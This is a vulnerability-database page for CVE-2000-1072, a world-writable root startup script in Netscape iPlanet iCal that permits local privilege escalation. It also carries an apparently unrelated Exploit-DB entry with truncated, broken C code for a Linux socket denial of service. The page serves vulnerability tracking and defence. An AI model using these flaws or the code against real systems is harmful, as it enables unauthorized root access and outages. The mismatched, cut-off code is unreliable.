CVE-2000-1072
published 2000-12-11CVE-2000-1072: iCal 2.1 Patch 2 installs many files with world-writeable permissions, which allows local users to modify the iCal configuration and execute arbitrary commands…
PriorityP422high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
1.08%
61.0th percentile
iCal 2.1 Patch 2 installs many files with world-writeable permissions, which allows local users to modify the iCal configuration and execute arbitrary commands by replacing the iplncal.sh program with a Trojan horse.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| netscape | iplanet_ical | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Netscape iCal 2.1 Patch2 - iPlanet iCal 'iplncal.sh' Permissions
exploitdb·2000-10-10
CVE-2000-1072 Netscape iCal 2.1 Patch2 - iPlanet iCal 'iplncal.sh' Permissions
Netscape iCal 2.1 Patch2 - iPlanet iCal 'iplncal.sh' Permissions
---
source: https://www.securityfocus.com/bid/1768/info
Netscape's iPlanet iCal application is a network based calendar service built for deployment in organizations which require a centralized calendar system. Certain versions of iCal ship with a vulnerability introduced in the installation process which will allow malicious local users to gain root on the system.
During the installation process a large number of files are left world readable and writable. One such file, /opt/SUNWicsrv/cal/bin/iplncal.sh is designed to be run at startup as root and is world writable by default. This allows users to modify the contents of this startup script and have it executed at boot up time or whenever the machine is re-initialized.
Exploit-DB
Linux Kernel 2.2.12/2.2.14/2.3.99 (RedHat 6.x) - Socket Denial of Service
exploitdb·2000-03-23
CVE-2000-0227 Linux Kernel 2.2.12/2.2.14/2.3.99 (RedHat 6.x) - Socket Denial of Service
Linux Kernel 2.2.12/2.2.14/2.3.99 (RedHat 6.x) - Socket Denial of Service
---
/*
source: https://www.securityfocus.com/bid/1072/info
A denial of service exists in Linux kernels, as related to Unix domain sockets ignoring limits as set in /proc/sys/net/core/wmem_max. By creating successive Unix domain sockets, it is possible to cause a denial of service in some versions of the Linux kernel. Versions 2.2.12, 2.2.14, and 2.3.99-pre2 have all been confirmed as being vulnerable. Previous kernel versions are most likely vulnerable.
*/
#include
#include
#include
char buf[128 * 1024];
int main ( int argc, char **argv )
{
struct sockaddr SyslogAddr;
int LogFile;
int bufsize = sizeof(buf)-5;
int i;
for ( i = 0; i < bufsize; i++ )
buf[i] = ' '+(i%95);
buf[i] = '\0';
SyslogAddr.sa_family = AF
No writeups or analysis indexed.
http://www.atstake.com/research/advisories/2000/a100900-1.txthttp://www.osvdb.org/7212http://www.securityfocus.com/bid/1768https://exchange.xforce.ibmcloud.com/vulnerabilities/5756http://www.atstake.com/research/advisories/2000/a100900-1.txthttp://www.osvdb.org/7212http://www.securityfocus.com/bid/1768https://exchange.xforce.ibmcloud.com/vulnerabilities/5756
2000-12-11
Published